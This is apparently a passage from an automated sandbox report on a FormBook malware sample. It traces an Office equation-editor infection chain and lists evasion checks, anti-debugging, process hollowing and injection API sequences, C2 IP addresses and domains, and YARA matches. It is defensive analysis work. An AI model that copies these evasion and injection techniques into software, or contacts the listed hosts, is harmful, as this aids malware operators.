Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	RDTSC instruction interceptor: First address: 000000000008897E second address: 0000000000088984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00229B80 rdtsc

4_2_00229B80

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2436	Thread sleep time: -240000s >= -30000s			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2436	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 2864	Thread sleep time: -48000s >= -30000s			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2856	Thread sleep time: -120000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Last function: Thread delayed

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: explorer.exe, 00000006.00000000.2089261949.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2094952508.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.2094994772.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000006.00000000.2094952508.0000000004234000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.2089285245.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}

Queries a list of all running processes

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00229B80 rdtsc

4_2_00229B80

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00409B20 LdrLoadDll,

5_2_00409B20

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00220042 push dword ptr fs:[00000030h]		4_2_00220042
Source: C:\Users\Public\vbc.exe	Code function: 4_2_03EC8E2B push dword ptr fs:[00000030h]		4_2_03EC8E2B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008F26F8 mov eax, dword ptr fs:[00000030h]		5_2_008F26F8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_023526F8 mov eax, dword ptr fs:[00000030h]		7_2_023526F8

Enables debug privileges

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 45.142.156.44 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.xpddwrfj.icu
Source: C:\Windows\explorer.exe	Domain query: www.likehowto.com
Source: C:\Windows\explorer.exe	Domain query: www.pjsgsc.com
Source: C:\Windows\explorer.exe	Network Connect: 203.76.236.103 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.7985699.com

Contains functionality to inject code into remote processes

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00220110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,ExitProcess,

4_2_00220110

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Thread register set: target process: 1388			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: ED0000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000006.00000000.2089393754.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 00000007.00000002.2377175053.0000000000F20000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.2089393754.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 00000007.00000002.2377175053.0000000000F20000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.2089261949.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.2089393754.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 00000007.00000002.2377175053.0000000000F20000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query local / system time

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040B530 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

4_2_0040B530

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE